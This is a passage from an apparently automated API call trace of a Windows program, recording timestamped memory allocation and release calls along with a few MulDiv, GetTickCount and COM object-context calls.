	[0108.730] ??3@YAXPEAX@Z () returned 0x1e00350001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2700500001
	[0108.730] ??3@YAXPEAX@Z () returned 0x28004d0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x1f00320001
	[0108.730] ??3@YAXPEAX@Z () returned 0x20002f0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x21002c0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2200290001
	[0108.730] ??3@YAXPEAX@Z () returned 0x29004a0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2a00470001
	[0108.730] ??3@YAXPEAX@Z () returned 0x1f006e0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2300260001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2400230001
	[0108.730] ??3@YAXPEAX@Z () returned 0x20006b0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2500200001
	[0108.730] ??3@YAXPEAX@Z () returned 0x26001d0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2b00440001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2c00410001
	[0108.730] ??3@YAXPEAX@Z () returned 0x27001a0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2800170001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2900140001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2a00110001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2d003e0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2e003b0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2100680001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2b000e0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2c000b0001
	[0108.730] ??3@YAXPEAX@Z () returned 0x2200650001
	[0108.731] ??3@YAXPEAX@Z () returned 0x2d00080001
	[0108.731] ??3@YAXPEAX@Z () returned 0x2e00050001
	[0108.731] ??3@YAXPEAX@Z () returned 0x2f00380001
	[0108.731] ??3@YAXPEAX@Z () returned 0x3000350001
	[0108.731] ??3@YAXPEAX@Z () returned 0x1
	[0108.731] ??3@YAXPEAX@Z () returned 0x16007a0001
	[0108.731] ??3@YAXPEAX@Z () returned 0x1700770001
	[0108.731] ??3@YAXPEAX@Z () returned 0x1800740001
	[0108.731] ??3@YAXPEAX@Z () returned 0x3100320001
	[0108.731] ??3@YAXPEAX@Z () returned 0x32002f0001
	[0108.731] ??3@YAXPEAX@Z () returned 0x2300620001
	[0108.731] ??3@YAXPEAX@Z () returned 0x1900710001
	[0108.731] ??3@YAXPEAX@Z () returned 0x1a006e0001
	[0108.731] ??3@YAXPEAX@Z () returned 0x24005f0001
	[0108.731] ??3@YAXPEAX@Z () returned 0x1b006b0001
	[0108.731] ??3@YAXPEAX@Z () returned 0x1c00680001
	[0108.731] ??3@YAXPEAX@Z () returned 0x33002c0001
	[0108.731] ??3@YAXPEAX@Z () returned 0x3400290001
	[0108.731] ??3@YAXPEAX@Z () returned 0x1d00650001
	[0108.731] ??3@YAXPEAX@Z () returned 0x1e00620001
	[0108.731] ??3@YAXPEAX@Z () returned 0x1f005f0001
	[0108.731] ??3@YAXPEAX@Z () returned 0x20005c0001
	[0108.731] ??3@YAXPEAX@Z () returned 0x3500260001
	[0108.731] ??3@YAXPEAX@Z () returned 0x3600230001
	[0108.731] ??3@YAXPEAX@Z () returned 0x25005c0001
	[0108.731] ??3@YAXPEAX@Z () returned 0x2100590001
	[0108.731] ??3@YAXPEAX@Z () returned 0x2200560001
	[0108.731] ??3@YAXPEAX@Z () returned 0x2600590001
	[0108.731] ??3@YAXPEAX@Z () returned 0x2300530001
	[0108.732] ??3@YAXPEAX@Z () returned 0x2400500001
	[0108.732] ??3@YAXPEAX@Z () returned 0x3700200001
	[0108.732] ??3@YAXPEAX@Z () returned 0x38001d0001
	[0108.732] ??3@YAXPEAX@Z () returned 0x25004d0001
	[0108.732] ??3@YAXPEAX@Z () returned 0x26004a0001
	[0108.732] ??3@YAXPEAX@Z () returned 0x2700470001
	[0108.732] ??3@YAXPEAX@Z () returned 0x2800440001
	[0108.732] ??3@YAXPEAX@Z () returned 0x39001a0001
	[0108.732] ??3@YAXPEAX@Z () returned 0x3a00170001
	[0108.732] ??3@YAXPEAX@Z () returned 0x2700560001
	[0108.732] ??3@YAXPEAX@Z () returned 0x2900410001
	[0108.732] ??3@YAXPEAX@Z () returned 0x2a003e0001
	[0108.732] ??3@YAXPEAX@Z () returned 0x2800530001
	[0108.732] ??3@YAXPEAX@Z () returned 0x2b003b0001
	[0108.732] ??3@YAXPEAX@Z () returned 0x2c00380001
	[0108.732] ??3@YAXPEAX@Z () returned 0x3b00140001
	[0108.732] ??3@YAXPEAX@Z () returned 0x3c00110001
	[0108.733] ??3@YAXPEAX@Z () returned 0x3400200001
	[0108.734] free (_Block=0x44ffd0) 
	[0108.734] free (_Block=0x444f90) 
	[0108.734] free (_Block=0x4513e0) 
	[0108.734] free (_Block=0x44ebc0) 
	[0108.734] free (_Block=0x44d7a0) 
	[0108.734] free (_Block=0x44cd80) 
	[0108.734] free (_Block=0x44c860) 
	[0108.734] ??3@YAXPEAX@Z () returned 0x57760f01
	[0108.734] ??3@YAXPEAX@Z () returned 0x57760f01
	[0108.734] ??3@YAXPEAX@Z () returned 0x59000b0001
	[0108.735] free (_Block=0x481530) 
	[0108.735] ??3@YAXPEAX@Z () returned 0x57760f01
	[0108.735] MulDiv (nNumber=669, nNumerator=100, nDenominator=1194) returned 56
	[0108.735] IUnknown:Release (This=0x25f420) returned 0x1
	[0108.735] GetTickCount () returned 0x2b9fb
	[0108.736] ??2@YAPEAX_K@Z () returned 0x455900
	[0108.737] ??2@YAPEAX_K@Z () returned 0x455930
	[0108.737] ??2@YAPEAX_K@Z () returned 0x455960
	[0108.738] ??2@YAPEAX_K@Z () returned 0x455990
	[0108.739] ??2@YAPEAX_K@Z () returned 0x4559c0
	[0108.740] ??2@YAPEAX_K@Z () returned 0x4559f0
	[0108.740] ??2@YAPEAX_K@Z () returned 0x455a20
	[0108.741] ??2@YAPEAX_K@Z () returned 0x455a50
	[0108.742] ??2@YAPEAX_K@Z () returned 0x455a80
	[0108.743] ??2@YAPEAX_K@Z () returned 0x455ab0
	[0108.743] ??2@YAPEAX_K@Z () returned 0x455ae0
	[0108.744] ??2@YAPEAX_K@Z () returned 0x455b10
	[0108.745] ??2@YAPEAX_K@Z () returned 0x455b40
	[0108.745] ??2@YAPEAX_K@Z () returned 0x455b70
	[0108.746] ??2@YAPEAX_K@Z () returned 0x455ba0
	[0108.747] ??2@YAPEAX_K@Z () returned 0x455bd0
	[0108.748] ??2@YAPEAX_K@Z () returned 0x455c00
	[0108.748] ??2@YAPEAX_K@Z () returned 0x455c30
	[0108.749] ??2@YAPEAX_K@Z () returned 0x455c60
	[0108.750] ??2@YAPEAX_K@Z () returned 0x455c90
	[0108.750] ??2@YAPEAX_K@Z () returned 0x455cc0
	[0108.751] ??2@YAPEAX_K@Z () returned 0x455cf0
	[0108.752] ??2@YAPEAX_K@Z () returned 0x455d20
	[0108.752] ??2@YAPEAX_K@Z () returned 0x455d50
	[0108.753] ??2@YAPEAX_K@Z () returned 0x455d80
	[0108.754] ??2@YAPEAX_K@Z () returned 0x455db0
	[0108.755] ??2@YAPEAX_K@Z () returned 0x455de0
	[0108.755] ??2@YAPEAX_K@Z () returned 0x455e10
	[0109.286] ??2@YAPEAX_K@Z () returned 0x455e40
	[0109.287] ??2@YAPEAX_K@Z () returned 0x455e70
	[0109.288] ??2@YAPEAX_K@Z () returned 0x455ea0
	[0109.288] ??2@YAPEAX_K@Z () returned 0x44c090
	[0109.289] ??2@YAPEAX_K@Z () returned 0x44c0c0
	[0109.290] ??2@YAPEAX_K@Z () returned 0x44c0f0
	[0109.290] ??2@YAPEAX_K@Z () returned 0x44c120
	[0109.291] ??2@YAPEAX_K@Z () returned 0x44c150
	[0109.292] ??2@YAPEAX_K@Z () returned 0x44c180
	[0109.292] ??2@YAPEAX_K@Z () returned 0x446910
	[0109.293] ??2@YAPEAX_K@Z () returned 0x446940
	[0109.294] ??2@YAPEAX_K@Z () returned 0x446970
	[0109.295] ??2@YAPEAX_K@Z () returned 0x4469a0
	[0109.295] ??2@YAPEAX_K@Z () returned 0x4469d0
	[0109.296] ??2@YAPEAX_K@Z () returned 0x446a00
	[0109.297] ??2@YAPEAX_K@Z () returned 0x446a30
	[0109.297] ??2@YAPEAX_K@Z () returned 0x446a60
	[0109.298] ??2@YAPEAX_K@Z () returned 0x446a90
	[0109.299] ??2@YAPEAX_K@Z () returned 0x446ac0
	[0109.299] ??2@YAPEAX_K@Z () returned 0x446af0
	[0109.300] ??2@YAPEAX_K@Z () returned 0x446b20
	[0109.301] ??2@YAPEAX_K@Z () returned 0x446b50
	[0109.302] ??2@YAPEAX_K@Z () returned 0x446b80
	[0109.302] ??2@YAPEAX_K@Z () returned 0x446bb0
	[0109.303] ??2@YAPEAX_K@Z () returned 0x446be0
	[0109.304] ??2@YAPEAX_K@Z () returned 0x446c10
	[0109.304] ??2@YAPEAX_K@Z () returned 0x446c40
	[0109.305] ??2@YAPEAX_K@Z () returned 0x446c70
	[0109.306] ??2@YAPEAX_K@Z () returned 0x446ca0
	[0109.307] ??2@YAPEAX_K@Z () returned 0x446cd0
	[0109.307] ??2@YAPEAX_K@Z () returned 0x446d00
	[0109.308] ??2@YAPEAX_K@Z () returned 0x446d30
	[0109.309] ??2@YAPEAX_K@Z () returned 0x446d60
	[0109.309] ??2@YAPEAX_K@Z () returned 0x446d90
	[0109.310] ??2@YAPEAX_K@Z () returned 0x446dc0
	[0109.311] ??2@YAPEAX_K@Z () returned 0x446df0
	[0109.311] ??2@YAPEAX_K@Z () returned 0x446e20
	[0109.312] ??2@YAPEAX_K@Z () returned 0x446e50
	[0109.313] ??2@YAPEAX_K@Z () returned 0x446e80
	[0109.314] ??2@YAPEAX_K@Z () returned 0x446eb0
	[0109.314] ??2@YAPEAX_K@Z () returned 0x446ee0
	[0109.315] ??2@YAPEAX_K@Z () returned 0x446f10
	[0109.316] ??2@YAPEAX_K@Z () returned 0x446f40
	[0109.316] ??2@YAPEAX_K@Z () returned 0x446f70
	[0109.317] ??2@YAPEAX_K@Z () returned 0x446fa0
	[0109.318] ??2@YAPEAX_K@Z () returned 0x446fd0
	[0109.319] ??2@YAPEAX_K@Z () returned 0x446fd0
	[0109.320] ??2@YAPEAX_K@Z () returned 0x446fd0
	[0109.321] ??2@YAPEAX_K@Z () returned 0x447000
	[0109.321] ??2@YAPEAX_K@Z () returned 0x447000
	[0109.322] ??2@YAPEAX_K@Z () returned 0x447030
	[0109.323] ??2@YAPEAX_K@Z () returned 0x447060
	[0109.323] ??2@YAPEAX_K@Z () returned 0x447060
	[0109.324] ??2@YAPEAX_K@Z () returned 0x447090
	[0109.325] ??2@YAPEAX_K@Z () returned 0x4451d0
	[0109.326] ??2@YAPEAX_K@Z () returned 0x4451d0
	[0109.326] ??2@YAPEAX_K@Z () returned 0x445200
	[0109.327] ??2@YAPEAX_K@Z () returned 0x445230
	[0109.328] ??2@YAPEAX_K@Z () returned 0x445230
	[0109.328] ??2@YAPEAX_K@Z () returned 0x445260
	[0109.329] ??2@YAPEAX_K@Z () returned 0x445290
	[0109.330] ??2@YAPEAX_K@Z () returned 0x445290
	[0109.330] ??2@YAPEAX_K@Z () returned 0x4452c0
	[0109.331] ??2@YAPEAX_K@Z () returned 0x4452f0
	[0109.332] ??2@YAPEAX_K@Z () returned 0x4452f0
	[0109.332] ??2@YAPEAX_K@Z () returned 0x445320
	[0109.894] ??2@YAPEAX_K@Z () returned 0x445350
	[0109.895] ??2@YAPEAX_K@Z () returned 0x445350
	[0109.896] ??2@YAPEAX_K@Z () returned 0x445380
	[0109.897] ??2@YAPEAX_K@Z () returned 0x4453b0
	[0109.897] ??2@YAPEAX_K@Z () returned 0x4453b0
	[0109.898] ??2@YAPEAX_K@Z () returned 0x4453e0
	[0109.899] ??2@YAPEAX_K@Z () returned 0x445410
	[0109.899] ??2@YAPEAX_K@Z () returned 0x445410
	[0109.900] ??2@YAPEAX_K@Z () returned 0x445440
	[0109.901] ??2@YAPEAX_K@Z () returned 0x445470
	[0109.901] ??2@YAPEAX_K@Z () returned 0x445470
	[0109.902] ??2@YAPEAX_K@Z () returned 0x4454a0
	[0109.903] ??2@YAPEAX_K@Z () returned 0x4454d0
	[0109.903] ??2@YAPEAX_K@Z () returned 0x4454d0
	[0109.904] ??2@YAPEAX_K@Z () returned 0x445500
	[0109.905] ??2@YAPEAX_K@Z () returned 0x445530
	[0109.905] ??2@YAPEAX_K@Z () returned 0x445530
	[0109.906] ??2@YAPEAX_K@Z () returned 0x445560
	[0109.907] ??2@YAPEAX_K@Z () returned 0x445590
	[0109.908] ??2@YAPEAX_K@Z () returned 0x445590
	[0109.908] ??2@YAPEAX_K@Z () returned 0x4455c0
	[0109.909] ??2@YAPEAX_K@Z () returned 0x4455f0
	[0109.910] ??2@YAPEAX_K@Z () returned 0x4455f0
	[0109.910] ??2@YAPEAX_K@Z () returned 0x445620
	[0109.911] ??2@YAPEAX_K@Z () returned 0x445650
	[0109.912] ??2@YAPEAX_K@Z () returned 0x445650
	[0109.912] ??2@YAPEAX_K@Z () returned 0x445680
	[0109.913] ??2@YAPEAX_K@Z () returned 0x4456b0
	[0109.914] ??2@YAPEAX_K@Z () returned 0x4456b0
	[0109.915] ??2@YAPEAX_K@Z () returned 0x4456e0
	[0109.915] ??2@YAPEAX_K@Z () returned 0x445710
	[0109.916] ??2@YAPEAX_K@Z () returned 0x445710
	[0109.917] ??2@YAPEAX_K@Z () returned 0x445740
	[0109.917] ??2@YAPEAX_K@Z () returned 0x445770
	[0109.918] ??2@YAPEAX_K@Z () returned 0x445770
	[0109.919] ??2@YAPEAX_K@Z () returned 0x4457a0
	[0109.920] ??2@YAPEAX_K@Z () returned 0x4457d0
	[0109.920] ??2@YAPEAX_K@Z () returned 0x4457d0
	[0109.921] ??2@YAPEAX_K@Z () returned 0x445800
	[0109.922] ??2@YAPEAX_K@Z () returned 0x445830
	[0109.922] ??2@YAPEAX_K@Z () returned 0x445830
	[0109.923] ??2@YAPEAX_K@Z () returned 0x445860
	[0109.924] ??2@YAPEAX_K@Z () returned 0x445890
	[0109.925] ??2@YAPEAX_K@Z () returned 0x445890
	[0109.925] ??2@YAPEAX_K@Z () returned 0x4458c0
	[0110.565] ??2@YAPEAX_K@Z () returned 0x4458f0
	[0110.566] ??2@YAPEAX_K@Z () returned 0x4458f0
	[0110.567] ??2@YAPEAX_K@Z () returned 0x445920
	[0110.567] ??2@YAPEAX_K@Z () returned 0x445950
	[0110.568] ??2@YAPEAX_K@Z () returned 0x445950
	[0110.569] ??2@YAPEAX_K@Z () returned 0x44b890
	[0110.569] ??2@YAPEAX_K@Z () returned 0x44b8c0
	[0110.570] ??2@YAPEAX_K@Z () returned 0x44b8c0
	[0110.571] ??2@YAPEAX_K@Z () returned 0x44b8f0
	[0110.572] ??2@YAPEAX_K@Z () returned 0x44b920
	[0110.572] ??2@YAPEAX_K@Z () returned 0x44b920
	[0110.573] ??2@YAPEAX_K@Z () returned 0x44b950
	[0110.574] ??2@YAPEAX_K@Z () returned 0x44b980
	[0110.574] ??2@YAPEAX_K@Z () returned 0x44b980
	[0110.575] ??2@YAPEAX_K@Z () returned 0x44b9b0
	[0110.576] ??2@YAPEAX_K@Z () returned 0x44b9e0
	[0110.576] ??2@YAPEAX_K@Z () returned 0x44b9e0
	[0110.577] ??2@YAPEAX_K@Z () returned 0x44ba10
	[0110.578] ??2@YAPEAX_K@Z () returned 0x44ba40
	[0110.578] ??2@YAPEAX_K@Z () returned 0x44ba40
	[0110.579] ??2@YAPEAX_K@Z () returned 0x44ba70
	[0110.580] ??2@YAPEAX_K@Z () returned 0x44baa0
	[0110.580] ??2@YAPEAX_K@Z () returned 0x44baa0
	[0110.581] ??2@YAPEAX_K@Z () returned 0x44bad0
	[0110.582] ??2@YAPEAX_K@Z () returned 0x44bb00
	[0110.583] ??2@YAPEAX_K@Z () returned 0x44bb00
	[0110.583] ??2@YAPEAX_K@Z () returned 0x44bb30
	[0110.584] ??2@YAPEAX_K@Z () returned 0x44bb60
	[0110.585] ??2@YAPEAX_K@Z () returned 0x44bb60
	[0110.585] ??2@YAPEAX_K@Z () returned 0x44bb90
	[0110.586] ??2@YAPEAX_K@Z () returned 0x44bbc0
	[0110.587] ??2@YAPEAX_K@Z () returned 0x44bbc0
	[0110.588] ??2@YAPEAX_K@Z () returned 0x44bbf0
	[0110.588] ??2@YAPEAX_K@Z () returned 0x44bc20
	[0110.589] ??2@YAPEAX_K@Z () returned 0x44bc20
	[0110.590] ??2@YAPEAX_K@Z () returned 0x44bc50
	[0110.590] CoGetObjectContext (in: riid=0x7fee1476350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1595a8 | out: ppv=0x1595a8*=0x25f420) returned 0x0
	[0110.591] MulDiv (nNumber=470, nNumerator=100, nDenominator=1042) returned 45
	[0110.591] IUnknown:Release (This=0x25f420) returned 0x1
	[0110.591] GetTickCount () returned 0x2c13b
	[0110.592] ??2@YAPEAX_K@Z () returned 0x446910
	[0110.593] ??2@YAPEAX_K@Z () returned 0x446910
	[0110.593] ??2@YAPEAX_K@Z () returned 0x446940
	[0110.594] ??2@YAPEAX_K@Z () returned 0x446970
	[0110.595] ??2@YAPEAX_K@Z () returned 0x446970
	[0110.596] ??2@YAPEAX_K@Z () returned 0x4469a0
	[0110.596] ??2@YAPEAX_K@Z () returned 0x4469d0
	[0110.597] ??2@YAPEAX_K@Z () returned 0x4469d0
	[0110.598] ??2@YAPEAX_K@Z () returned 0x446a00
	[0110.598] ??2@YAPEAX_K@Z () returned 0x446a30
	[0110.599] ??2@YAPEAX_K@Z () returned 0x446a30
	[0110.600] ??2@YAPEAX_K@Z () returned 0x446a60
	[0110.600] ??2@YAPEAX_K@Z () returned 0x446a90
	[0110.601] ??2@YAPEAX_K@Z () returned 0x446a90
	[0110.602] ??2@YAPEAX_K@Z () returned 0x446ac0
	[0110.603] ??2@YAPEAX_K@Z () returned 0x446af0
	[0110.603] ??2@YAPEAX_K@Z () returned 0x446af0
	[0110.604] ??2@YAPEAX_K@Z () returned 0x446b20
	[0110.605] ??2@YAPEAX_K@Z () returned 0x446b50
	[0110.605] ??2@YAPEAX_K@Z () returned 0x446b50
	[0110.606] ??2@YAPEAX_K@Z () returned 0x446b80
	[0110.607] ??2@YAPEAX_K@Z () returned 0x446bb0
	[0110.608] ??2@YAPEAX_K@Z () returned 0x446bb0
	[0110.608] ??2@YAPEAX_K@Z () returned 0x446be0
	[0110.609] ??2@YAPEAX_K@Z () returned 0x446c10
	[0110.610] ??2@YAPEAX_K@Z () returned 0x446c10
	[0110.610] ??2@YAPEAX_K@Z () returned 0x446c40
	[0110.611] ??2@YAPEAX_K@Z () returned 0x446c70
	[0110.612] ??2@YAPEAX_K@Z () returned 0x446c70
	[0111.002] ??2@YAPEAX_K@Z () returned 0x446ca0
	[0111.003] ??2@YAPEAX_K@Z () returned 0x446cd0
	[0111.004] ??2@YAPEAX_K@Z () returned 0x446cd0
	[0111.005] ??2@YAPEAX_K@Z () returned 0x446d00
	[0111.005] ??2@YAPEAX_K@Z () returned 0x446d30
	[0111.006] ??2@YAPEAX_K@Z () returned 0x446d30
	[0111.007] ??2@YAPEAX_K@Z () returned 0x446d60
	[0111.008] ??2@YAPEAX_K@Z () returned 0x446d90
	[0111.008] ??2@YAPEAX_K@Z () returned 0x446d90
	[0111.009] ??2@YAPEAX_K@Z () returned 0x446dc0
	[0111.010] ??2@YAPEAX_K@Z () returned 0x446df0
	[0111.010] ??2@YAPEAX_K@Z () returned 0x446df0
	[0111.011] ??2@YAPEAX_K@Z () returned 0x446e20
	[0111.012] ??2@YAPEAX_K@Z () returned 0x446e50
	[0111.012] ??2@YAPEAX_K@Z () returned 0x446e50
	[0111.013] ??2@YAPEAX_K@Z () returned 0x446e80
	[0111.014] ??2@YAPEAX_K@Z () returned 0x446eb0
	[0111.015] ??2@YAPEAX_K@Z () returned 0x446eb0
	[0111.015] ??2@YAPEAX_K@Z () returned 0x446ee0
	[0111.016] ??2@YAPEAX_K@Z () returned 0x446f10
	[0111.017] ??2@YAPEAX_K@Z () returned 0x446f10
	[0111.017] ??2@YAPEAX_K@Z () returned 0x446f40
	[0111.018] ??2@YAPEAX_K@Z () returned 0x446f70
	[0111.019] ??2@YAPEAX_K@Z () returned 0x446f70
	[0111.020] ??2@YAPEAX_K@Z () returned 0x446fa0
	[0111.020] ??2@YAPEAX_K@Z () returned 0x454720
	[0111.021] ??2@YAPEAX_K@Z () returned 0x454720
	[0111.022] ??2@YAPEAX_K@Z () returned 0x454750
	[0111.023] ??2@YAPEAX_K@Z () returned 0x454780
	[0111.023] ??2@YAPEAX_K@Z () returned 0x454780
	[0111.024] ??2@YAPEAX_K@Z () returned 0x4547b0
	[0111.025] ??2@YAPEAX_K@Z () returned 0x4547e0
	[0111.025] ??2@YAPEAX_K@Z () returned 0x4547e0
	[0111.026] ??2@YAPEAX_K@Z () returned 0x454810
	[0111.027] ??2@YAPEAX_K@Z () returned 0x454840
	[0111.027] ??2@YAPEAX_K@Z () returned 0x454840
	[0111.028] ??2@YAPEAX_K@Z () returned 0x454870
	[0111.029] ??2@YAPEAX_K@Z () returned 0x4548a0
	[0111.030] ??2@YAPEAX_K@Z () returned 0x4548a0
	[0111.030] ??2@YAPEAX_K@Z () returned 0x4548d0
	[0111.031] ??2@YAPEAX_K@Z () returned 0x454900
	[0111.032] ??2@YAPEAX_K@Z () returned 0x454900
	[0111.032] ??2@YAPEAX_K@Z () returned 0x454930
	[0111.042] ??2@YAPEAX_K@Z () returned 0x454960
	[0111.042] ??2@YAPEAX_K@Z () returned 0x454960
	[0111.043] ??2@YAPEAX_K@Z () returned 0x454990
	[0111.044] ??2@YAPEAX_K@Z () returned 0x4549c0
	[0111.045] ??2@YAPEAX_K@Z () returned 0x4549c0
	[0111.045] ??2@YAPEAX_K@Z () returned 0x4549f0
	[0111.046] ??2@YAPEAX_K@Z () returned 0x454a20
	[0111.047] ??2@YAPEAX_K@Z () returned 0x454a20
	[0111.047] ??2@YAPEAX_K@Z () returned 0x454a50
	[0111.048] ??2@YAPEAX_K@Z () returned 0x454a80
	[0111.506] ??2@YAPEAX_K@Z () returned 0x454a80
	[0111.510] ??2@YAPEAX_K@Z () returned 0x454ab0
	[0111.511] ??2@YAPEAX_K@Z () returned 0x454ae0
	[0111.511] ??2@YAPEAX_K@Z () returned 0x454ae0
	[0111.512] ??2@YAPEAX_K@Z () returned 0x454b10
	[0111.513] ??2@YAPEAX_K@Z () returned 0x454b40
	[0111.513] ??2@YAPEAX_K@Z () returned 0x454b40
	[0111.514] ??2@YAPEAX_K@Z () returned 0x454b70
	[0111.515] ??2@YAPEAX_K@Z () returned 0x454ba0
	[0111.516] ??2@YAPEAX_K@Z () returned 0x454ba0
	[0111.516] ??2@YAPEAX_K@Z () returned 0x454bd0
	[0111.517] ??2@YAPEAX_K@Z () returned 0x454c00
	[0111.518] ??2@YAPEAX_K@Z () returned 0x454c00
	[0111.519] ??2@YAPEAX_K@Z () returned 0x454c30
	[0111.519] ??2@YAPEAX_K@Z () returned 0x454c60
	[0111.520] ??2@YAPEAX_K@Z () returned 0x454c60
	[0111.521] ??2@YAPEAX_K@Z () returned 0x454c90
	[0111.522] ??2@YAPEAX_K@Z () returned 0x454cc0
	[0111.522] ??2@YAPEAX_K@Z () returned 0x454cc0
	[0111.523] ??2@YAPEAX_K@Z () returned 0x454cf0
	[0111.524] ??2@YAPEAX_K@Z () returned 0x454d20
	[0111.524] ??2@YAPEAX_K@Z () returned 0x454d20
	[0111.525] ??2@YAPEAX_K@Z () returned 0x44bc80
	[0111.526] ??2@YAPEAX_K@Z () returned 0x44bcb0
	[0111.526] ??2@YAPEAX_K@Z () returned 0x44bcb0
	[0111.527] ??2@YAPEAX_K@Z () returned 0x44bce0
	[0111.528] ??2@YAPEAX_K@Z () returned 0x44bd10
	[0111.528] ??2@YAPEAX_K@Z () returned 0x44bd10
	[0111.529] ??2@YAPEAX_K@Z () returned 0x44bd40
	[0111.530] ??2@YAPEAX_K@Z () returned 0x44bd70
	[0111.530] ??2@YAPEAX_K@Z () returned 0x44bd70
	[0111.531] ??2@YAPEAX_K@Z () returned 0x44bda0
	[0111.532] ??2@YAPEAX_K@Z () returned 0x44bdd0
	[0111.533] ??2@YAPEAX_K@Z () returned 0x44bdd0
	[0111.534] ??2@YAPEAX_K@Z () returned 0x44be00
	[0111.535] ??2@YAPEAX_K@Z () returned 0x44be30
	[0111.535] ??2@YAPEAX_K@Z () returned 0x44be30
	[0111.536] ??2@YAPEAX_K@Z () returned 0x44be60
	[0111.537] ??2@YAPEAX_K@Z () returned 0x44be90
	[0111.537] ??2@YAPEAX_K@Z () returned 0x44be90
	[0111.538] ??2@YAPEAX_K@Z () returned 0x44bec0
	[0111.539] ??2@YAPEAX_K@Z () returned 0x44bef0
	[0111.540] ??2@YAPEAX_K@Z () returned 0x44bef0
	[0111.540] ??2@YAPEAX_K@Z () returned 0x44bf20
	[0111.541] ??2@YAPEAX_K@Z () returned 0x44bf50
	[0111.542] ??2@YAPEAX_K@Z () returned 0x44bf50
	[0111.542] ??2@YAPEAX_K@Z () returned 0x44bf80
	[0111.543] ??2@YAPEAX_K@Z () returned 0x44bfb0
	[0111.544] ??2@YAPEAX_K@Z () returned 0x44bfb0
	[0111.545] ??2@YAPEAX_K@Z () returned 0x44bfe0
	[0111.545] ??2@YAPEAX_K@Z () returned 0x44c010
	[0111.546] ??2@YAPEAX_K@Z () returned 0x44c010
	[0111.547] ??2@YAPEAX_K@Z () returned 0x44c090
	[0111.548] ??2@YAPEAX_K@Z () returned 0x44c0c0
	[0112.047] ??2@YAPEAX_K@Z () returned 0x44c0c0
	[0112.048] ??2@YAPEAX_K@Z () returned 0x44c0f0
	[0112.049] ??2@YAPEAX_K@Z () returned 0x44c120
	[0112.049] ??2@YAPEAX_K@Z () returned 0x44c120
	[0112.050] ??2@YAPEAX_K@Z () returned 0x44c150
	[0112.051] ??2@YAPEAX_K@Z () returned 0x44c180
	[0112.052] ??2@YAPEAX_K@Z () returned 0x44c180
	[0112.052] ??2@YAPEAX_K@Z () returned 0x455720
	[0112.053] ??2@YAPEAX_K@Z () returned 0x455750
	[0112.054] ??2@YAPEAX_K@Z () returned 0x455750
	[0112.054] ??2@YAPEAX_K@Z () returned 0x455780
	[0112.055] ??2@YAPEAX_K@Z () returned 0x4557b0
	[0112.056] ??2@YAPEAX_K@Z () returned 0x4557b0
	[0112.057] ??2@YAPEAX_K@Z () returned 0x4557e0
	[0112.057] ??2@YAPEAX_K@Z () returned 0x455810
	[0112.058] ??2@YAPEAX_K@Z () returned 0x455810
	[0112.059] ??2@YAPEAX_K@Z () returned 0x455840
	[0112.059] ??2@YAPEAX_K@Z () returned 0x455870
	[0112.060] ??2@YAPEAX_K@Z () returned 0x455870
	[0112.061] ??2@YAPEAX_K@Z () returned 0x4558a0
	[0112.062] ??2@YAPEAX_K@Z () returned 0x4558d0
	[0112.062] ??2@YAPEAX_K@Z () returned 0x4558d0
	[0112.063] ??2@YAPEAX_K@Z () returned 0x455900
	[0112.064] ??2@YAPEAX_K@Z () returned 0x455930
	[0112.064] ??2@YAPEAX_K@Z () returned 0x455930
	[0112.065] ??2@YAPEAX_K@Z () returned 0x455960
	[0112.066] ??2@YAPEAX_K@Z () returned 0x455990
	[0112.067] ??2@YAPEAX_K@Z () returned 0x455990
	[0112.067] ??2@YAPEAX_K@Z () returned 0x4559c0
	[0112.068] ??2@YAPEAX_K@Z () returned 0x4559f0
	[0112.069] ??2@YAPEAX_K@Z () returned 0x4559f0
	[0112.069] ??2@YAPEAX_K@Z () returned 0x455a20
	[0112.070] ??2@YAPEAX_K@Z () returned 0x455a50
	[0112.071] ??2@YAPEAX_K@Z () returned 0x455a50
	[0112.071] ??2@YAPEAX_K@Z () returned 0x455a80
	[0112.072] ??2@YAPEAX_K@Z () returned 0x455ab0
	[0112.073] ??2@YAPEAX_K@Z () returned 0x455ab0
	[0112.074] ??2@YAPEAX_K@Z () returned 0x455ae0
	[0112.074] ??2@YAPEAX_K@Z () returned 0x455b10
	[0112.075] ??2@YAPEAX_K@Z () returned 0x455b10
	[0112.076] ??2@YAPEAX_K@Z () returned 0x455b40
	[0112.076] ??2@YAPEAX_K@Z () returned 0x455b70
	[0112.077] ??2@YAPEAX_K@Z () returned 0x455b70
	[0112.078] ??2@YAPEAX_K@Z () returned 0x455ba0
	[0112.625] ??2@YAPEAX_K@Z () returned 0x455bd0
	[0112.626] ??2@YAPEAX_K@Z () returned 0x455bd0
	[0112.627] ??2@YAPEAX_K@Z () returned 0x455c00
	[0112.628] ??2@YAPEAX_K@Z () returned 0x455c30
	[0112.628] ??2@YAPEAX_K@Z () returned 0x455c30
	[0112.629] ??2@YAPEAX_K@Z () returned 0x455c60
	[0112.630] ??2@YAPEAX_K@Z () returned 0x455c90
	[0112.630] ??2@YAPEAX_K@Z () returned 0x455c90
	[0112.631] ??2@YAPEAX_K@Z () returned 0x455cc0
	[0112.632] ??2@YAPEAX_K@Z () returned 0x455cf0
	[0112.632] ??2@YAPEAX_K@Z () returned 0x455cf0
	[0112.633] ??2@YAPEAX_K@Z () returned 0x455d20
